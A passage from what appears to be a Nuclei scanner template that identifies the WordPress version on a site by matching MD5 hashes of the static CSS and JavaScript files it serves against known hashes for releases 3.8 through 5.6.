- - "(\"b3cf8e531a9c15bb7952877a43a5cd64\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"a5cc9931638552cae57f9c701fd8f776\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"6a5c4ff8a9f11b2344e05fe1318ac520\" == md5(body))" - - type: dsl - name: 3.8.1 - 3.8.35 - dsl: - - "(\"cf2aec29e53cf7fcfeed958de2b1aec7\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"7764b220df0d9356ec51b6946533c7ac\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"5d6b5071186dbd3e8af754f6a013ba18\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"363ed44b087adae1c3fd9231f8fe79d2\" == md5(body))" - - type: dsl - name: 5.2 - dsl: - - "(\"def33a673e34fac8f0b6df1cf4a6c5df\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.4.4 - dsl: - - "(\"aceacf5c4e3295d6dbab9118d672d1e4\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"4b20f5f54d861ef753f71d48e39e3f80\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"2c4af0bbdf2fb60fc46ee752e4bb7ee9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/nav-menus-rtl.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"71e4ef8ec8da9599e176043a5d31e025\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"63af64ba89f768e448bab87ee0cb94da\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"acc2861152c365bbafbfff8ab3baaf55\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"977215a7d6324e9bbd607305187355a1\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"84d2cdacbe7a308bea0ed482fc236bb7\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"ced8cb7d002258e5a711cc0e610b3cf0\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"91ff408d32eacbd28e621c34b7565f8d\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"02cb4a48791d540267d3f1bdc7b25a8f\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"75344ea8409de819ebc101366c402c11\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"f840b18a792635481d3a0e5b8ff55612\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.4 - dsl: - - "(\"745ae83cdb88166b48e13f879c600ff7\" == md5(body))" - - type: dsl - name: 4.9.5 - 5.0.11 - dsl: - - "(\"6583418c9dfc4767fd8df8059be75015\" == md5(body))" - - type: dsl - name: 5.1 - dsl: - - "(\"8488283c909d6b599b0bfc4135c8c885\" == md5(body))" - - type: dsl - name: 5.1.1 - 5.1.8 - dsl: - - "(\"2666a090dd22c66ad83fa1ed000a068a\" == md5(body))" - - type: dsl - name: 5.2 - dsl: - - "(\"522e0398389b0db63783a3d8d35dd002\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.2.9 - dsl: - - "(\"c5e41c8c4080a281258cba02483eacd2\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"edc470548ca17c52be8c94f6fc8b6c86\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"6f9db94ed589ac53ac4f95f7bfd46157\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"3ce0fdd54d7109ff5ba425d88509c06b\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"e3da39b7d64c16ecb4298e483a7c2a74\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/site-health-rtl.css" - matchers: - - type: dsl - name: 5.2 - dsl: - - "(\"19991d9e26681ff01629a0cf58651bae\" == md5(body))" - - type: dsl - name: 5.2.1 - dsl: - - "(\"7592e3eb7de71932226882365aa3819f\" == md5(body))" - - type: dsl - name: 5.2.2 - 5.2.9 - dsl: - - "(\"e66fa0b23640d556008829f69c9a2d16\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"27c646e3c3864f931729676695034395\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"9bf7afac2006b8184971c08d3d246f7c\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"cc0cc3c4152cc9d4d7b17d2ae725f02f\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"452f6383f0d9263dda6b0d5ea88a6db9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/site-health-rtl.min.css" - matchers: - - type: dsl - name: 5.2 - dsl: - - "(\"14f7a6c96c22eef6f02fa918f7c8b6e2\" == md5(body))" - - type: dsl - name: 5.2.1 - dsl: - - "(\"2d2ae0d8ae344824615e599729f5ea36\" == md5(body))" - - type: dsl - name: 5.2.2 - 5.2.9 - dsl: - - "(\"ed8b548ceed11d315604c72a57972503\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"c61f97d295efa7b259a1c31ed539a06c\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"15345e2225ade03956ab276155af29e6\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"0b7dcfb8747c7e5e73feea29e6c4b76d\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"b5ae779b1a5499ec7b6cb2b41d3f7e63\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/site-health.css" - matchers: - - type: dsl - name: 5.2 - dsl: - - "(\"a815a72dc9c0594be5aaf9cf1b9ce464\" == md5(body))" - - type: dsl - name: 5.2.1 - dsl: - - "(\"5eb3454daf100e4be230440daa329ae6\" == md5(body))" - - type: dsl - name: 5.2.2 - 5.2.9 - dsl: - - "(\"c1f0b9a047b6061761580ef3ee214089\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"f8ae37763a8ce5880c9b2eb6846ff309\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"1539b98902afecd3a677150c6be08723\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"6a418be61b03da0ba6d7d5c08311f531\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"244c9df5b8da8e654172b69d05eafed3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/site-health.min.css" - matchers: - - type: dsl - name: 5.2 - dsl: - - "(\"b875bcda0ce59674010c90917c167595\" == md5(body))" - - type: dsl - name: 5.2.1 - dsl: - - "(\"69c4f2948081065924089d12e39b1a0a\" == md5(body))" - - type: dsl - name: 5.2.2 - 5.2.9 - dsl: - - "(\"33fb80d8f91159c6b8b86fb219bc4fa8\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"a64377bb1095c77534632279ece6c742\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"3746073895dac1541ea0fd7bbd0e3501\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"6e75baa8fa43d1a0850c08805314d8c9\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"8ff63629a11bdd97ced82973fcab7562\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wp-emoji-release.min.js" - matchers: - - type: dsl - name: 4.8.2 - 4.9.2 - dsl: - - "(\"af2f44df3198cfda9fd515873696ad00\" == md5(body))" - - type: dsl - name: 4.8 - 4.8.1 - dsl: - - "(\"8b90a6e26cce1c0a39bfa8b7e0fe909e\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"cb6284b70da03a43468244be7eafa362\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"64d7608a1b81f07f97f87506b87a8a5a\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"f3789112e7c443dc1d661159005af3e4\" == md5(body))" - - type: dsl - name: 4.4.3 - 4.4.24 - dsl: - - "(\"b22ca0bb06142d867f03bd0d89642997\" == md5(body))" - - type: dsl - name: 4.4.1 - 4.4.2 - dsl: - - "(\"3f19e615bd0d76b9f3457d0f44d5211b\" == md5(body))" - - type: dsl - name: 4.4 - dsl: - - "(\"1601e8da361dc8f86caa5afe88e37f5c\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"1c64b125732c6fe54928ee058ea72595\" == md5(body))" - - type: dsl - name: 4.2.3 - 4.2.29 - dsl: - - "(\"5976e0125334346c7a6211dd341db80e\" == md5(body))" - - type: dsl - name: 4.2.2 - dsl: - - "(\"c2e58e292752044c979a4efe494e1299\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.1 - dsl: - - "(\"ea188c2a9a5622ddd0451da92900799d\" == md5(body))" - - type: dsl - name: 4.9.3 - 4.9.7 - dsl: - - "(\"a7c259ac67b3b4002dc8ac4a09765b9d\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.0.11 - dsl: - - "(\"15d0c302dc74fd87bd9cfeab513e13e4\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"c17b309d8ab4b4e9653876d3c35c397d\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"fd997843190935059fe09163ecf229a5\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"b2bdc6d8dfd107ed138f042d71ad4be2\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"ec33f485ba2d4767dae9d112b78f8b02\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"8b9f36f8ca91dda15909c08299ddf4ad\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"c748456e1cf97f3303ee25c838b1ad76\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/list-tables.css" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"42d17149c8bfdd7bebab0f53091a540a\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"beb6bf82e0790eac731ed2c9cf74bc3f\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"3ff2a3c0951e5984e1679e368706ec80\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"4b8d9513e1dda944e989056488048494\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.3.25 - dsl: - - "(\"0a4fd78915295ce70bda1d402bfa1243\" == md5(body))" - - type: dsl - name: 4.3 - dsl: - - "(\"e5a6313e0366749912b54fc9e6040369\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"b34413b3174ac624919ce065ebb29aba\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"d3d28113c92faef3c774e0d3344e6753\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"bc8de1e3aa737d9a6450fa52af53fca9\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"90f30b6794fb69ec0541ee4c0b489642\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"de506d4d874f0c934c2fd497284f1cf3\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"6e5a8f97fb61749f4ce2774ce9882d9f\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"4306f07d19cb972ef5b21f7f7df2a700\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"e72f0c18a1ac5753fca51e7ffa4c6840\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"d037c13f12f0d6e2bb80796aa1fa7100\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"df2291c2b2d7db61ec1759a80639ae6a\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"41bf5f054e0769ac8c19771c9e7898b9\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"e185971aba90c98bede11c149165d1bd\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"bfc791004a369b00c17bac0f2422949b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/list-tables-rtl.css" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"746b23cd955a0b7107f57b83bb42eaa8\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"cbed75a1b6445166304c7f98e244451a\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"e7ab062a42f5d7660c2e05a20cdb1e79\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"f3db51aaac5931d61f45b7d025018ddd\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.3.25 - dsl: - - "(\"fa889ee210eab899c77c4fb798382a7f\" == md5(body))" - - type: dsl - name: 4.3 - dsl: - - "(\"8450e3801667a4d5f4d5119cf76d23ac\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"a44b142006df40f488aec4ea1357883c\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"611bc9de9e6a21a2a5e212e3662c310b\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"26f22d6631f339ad47196082f40de0d2\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"3b84dce5fe42bd82dcbdd360524e6885\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"aa514770cd537ac1dab53b85ad96b929\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"8ba73ea9935bbe0062f747e1d084f542\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"05619b1a7fa0923fdc99f081dabccc25\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"b74cc4eea587399f54605be6c761a682\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"1aa559e1f4775e857e0758979b9bb728\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"84dec80acc4755197100bfa80edf7d19\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"961ad7e71c705c7e758797f35d64035e\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"c603d3442c8daa8e824854b5d7150866\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"17daddb65adfa5ef0434db0162b86dd7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/core-data.js" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"c3d32f5dd4f33a89882a4f3cbafc940f\" == md5(body))" - - type: dsl - name: 5.0.2 - dsl: - - "(\"0ba8486f9af269c4f15ccb446fa2e5cf\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.11 - dsl: - - "(\"d9d282309deba0fae8e0d9e1390bb2a0\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"cb85cf4b9ae2a6381b1a86fa89fb00aa\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"72ce8e024f83842696876fbe0b892c73\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"a4b350169e5e63499026406ea5028a6f\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"a00f664edef495e33670bc0524284989\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"0f271130cb6a7aba0a543efb33674d96\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"586fc92c2f1f003c7bed0ffa8ffd2296\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"010335a7eb409f2d9aa88519224931aa\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/core-data.min.js" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"ced082774acad429d083a6950f6628c8\" == md5(body))" - - type: dsl - name: 5.0.2 - dsl: - - "(\"d97824b5d4dd4da084ce9d60d6d2d24c\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.11 - dsl: - - "(\"73143e8195b1151c70875f1f7717e778\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"8bb6dfc7a694dc50d11d0fcf7ab7dd82\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"4e11a15c78ad0a4058eaf79431984730\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"9ad4ec366f1ecfdc2ee3246da8aeba12\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"b800c3b5370efc6207abaf2a7609edab\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"4a8ed0892820752f3167351b83bf97e4\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"f37c57b5e57c30a4fc7eb773f538a180\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"262ccfe129b4b19a5cae7bd108548486\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/editor/style-rtl.css" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"46df98dc062cb7b94aaf2fb4e4281446\" == md5(body))" - - type: dsl - name: 5.0.2 - dsl: - - "(\"56617c86221439d8d23e5a718e0254ad\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.11 - dsl: - - "(\"54a9556e4830fb69925ad216617c5aad\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"3d25a492a20498e5cc6079bb415229cb\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"e0a7cc4c8737ceb854977049f33c3a38\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"46947f78f46f99af4bac89dd1da70cd1\" == md5(body))" - - type: dsl - name: 5.4 - dsl: - - "(\"28198d097d66e3ae2e4c629582b509c4\" == md5(body))" - - type: dsl - name: 5.4.1 - 5.4.4 - dsl: - - "(\"7bd14c8e33f234537fcd94d597d10899\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"e99936017ea5a1097387e30fb101f217\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"3ad946b505a2b3daee06388e607b9501\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/editor/style.css" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"96e3e6b2948530ce7f016ab0400006a1\" == md5(body))" - - type: dsl - name: 5.0.2 - dsl: - - "(\"cd3dee513ca0233a0239f64fc6188638\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.11 - dsl: - - "(\"59d50c0db9d21f6a092e347714520c01\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"3c01e1e5243ac56a810d123f6f54bdbd\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"d4f6f63315fabfe67ee51657f5dad012\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"f8b85f00c1b9dfc396d3d88b3e82e2d1\" == md5(body))" - - type: dsl - name: 5.4 - dsl: - - "(\"3db1581f4f550fbefb2e1463af099255\" == md5(body))" - - type: dsl - name: 5.4.1 - 5.4.4 - dsl: - - "(\"7e0f44886262bba35795227fa8509b2f\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"0d82bfbebd5c1a7daca9d8838d8f42e6\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"6f7537b8f5767cc8f7549c8029d8b79c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/about.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"3e86ee80c4757521083fddf65019f0f8\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"c32129f38a610afeb5dab84cc2b42e4c\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"205cf588eb9148f70d7ba3a7632fed00\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"f09335d5dd7bac3dfe1b465dedc21884\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.4 - dsl: - - "(\"3ffba678fe0d4d1c646548bfa0852e0e\" == md5(body))" - - type: dsl - name: 4.9.5 - 4.9.16 - dsl: - - "(\"361b64acafceb9cf7c9ce468ad4e8bbe\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"718d7d80feb983bda20b662544bff255\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"cebf5e333fceaf3a09ac21206d9e4456\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"fa5010338412db572184b952c5f4ca1d\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"88642f61e57afda1fe4d990b74ace699\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"bbf6106da26fcee52129ee9fc94c1274\" == md5(body))" - - type: dsl - name: 5.4 - dsl: - - "(\"83bf1c455339d52f73f9f0f4dfe5ead6\" == md5(body))" - - type: dsl - name: 5.4.1 - 5.4.4 - dsl: - - "(\"9c19373b31c25620aaae73ff3a6c3cd3\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"6844aa5a41dc592f8d440ef94866a07d\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"1416017950ab1d21dc3e62b4bbf8b74a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/about.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"d4838a0cc22480b2f6c1bbdadacdc3ef\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"058a5c94a16613204b8b983be03b16c6\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"78b67f44579068eb8a32c2d710a197e9\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"95db5eece947287d156afe6ec7ca8403\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"a81a4579a2bf58c42998289ea1ca04d2\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"d3b700086ab8f218fd0986abe9c37601\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"f0c69f88bca95e586cd57cf7b50d56ce\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"b9fb9fd3206264ae2dfc758320e4fe2a\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"2de0fcd4fae637c2aca9a0d6bab89ae5\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"08b2f42d94424e7286e13f07c84e2613\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.4 - dsl: - - "(\"871ed49ec868803d4bbda74cd056b5f2\" == md5(body))" - - type: dsl - name: 4.9.5 - 4.9.16 - dsl: - - "(\"bb9b6fbc1d72522b2a28a7eaeb188cbd\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"229b8ef25f99dcdb2a3bb54aa98e05f0\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"e926309fb95633d36c56f6d493ce1c71\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"77b749a7fbd4dbaa77847c5a31e53b81\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"932eae208509eff74628c9823eb6c857\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"d218cc5bad00dc5fbd1dbb700b9a633a\" == md5(body))" - - type: dsl - name: 5.4 - dsl: - - "(\"2ad7e2a527f4964d216eaa65bc74b9bc\" == md5(body))" - - type: dsl - name: 5.4.1 - 5.4.4 - dsl: - - "(\"081c37be6a3ade3eb41c567f545c838a\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"56562a00c8ad3a0e0b7cc6fce51400bd\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"8c86fe6f4995c72b426099da6bb00a94\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/about-rtl.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"2df8ff7a7b394e41cba1f30b711f4597\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"9f68812437e18cc5b27b48ade01e6319\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"114df4c9f91f08b37ac227c43c9461ec\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"945adb0a070994b88b38a1435ba156b2\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"7eb9a84f6a5e8f9856fabe6f60ae26d0\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"070bb778119c82963673e25e8d87a22a\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"a2812f9bae76c25229981a60a3452159\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"e24b2585db1193b02e488fadf94556f6\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"1dedd8baf6ded0cffcd68486568f48d3\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"efa868c38c56b4f20e24e42434fd75c9\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.4 - dsl: - - "(\"9ee8a4c60f28860ca3880eb08420da35\" == md5(body))" - - type: dsl - name: 4.9.5 - 4.9.16 - dsl: - - "(\"c260aca44db825b1a9c18c25e01a1994\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"44136116a8d6a562e4e24c2e92a5497e\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"d8170174c63a02f4cee1ac1555f4c714\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"6e5d25bcbd4b0bc5d7985726a5c75b25\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"a8b86325839973057132c58b9b3e92aa\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"0e042d73816458bd697aad16c3949840\" == md5(body))" - - type: dsl - name: 5.4 - dsl: - - "(\"941d939b4fed92d736eca75101dfb0fd\" == md5(body))" - - type: dsl - name: 5.4.1 - 5.4.4 - dsl: - - "(\"ab6d1b6da897ad2f5c2d6efc5930195d\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"b4f2ce7a2583ca3be4510f6aea884f7a\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"597c5b2c2a12373f069e3bfcc1234f70\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/about-rtl.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"8d05415e4e89324ef4e55877369ff484\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"cad438384d68d17329fc137dc4e70f6f\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"e49b0b679670933616a105c5e36c0996\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"6133222a9a4e020cc470597e2b03ade0\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.4 - dsl: - - "(\"f20c6e14d6405a90139741f3408d131c\" == md5(body))" - - type: dsl - name: 4.9.5 - 4.9.16 - dsl: - - "(\"1e470d76d5b4e0602dcc8816b300d7da\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"ad2c3b52306afa838247a29f5dc8abaf\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"2c9b9d16ab26ca648a797cc6d1bc083b\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"30e7181b360d0371a72c736456ed9814\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"aa3864d2140200bd86c347b31d2c7208\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"5f0344be8172538fc040a5fb2b616704\" == md5(body))" - - type: dsl - name: 5.4 - dsl: - - "(\"54cef500a837d369390eaa0ce40a0c06\" == md5(body))" - - type: dsl - name: 5.4.1 - 5.4.4 - dsl: - - "(\"956415400ece9efeed1a49ac08c5428c\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"6b60539b5b42f59ebbccefc9d007a5ba\" == md5(body))" - - type: dsl - name: 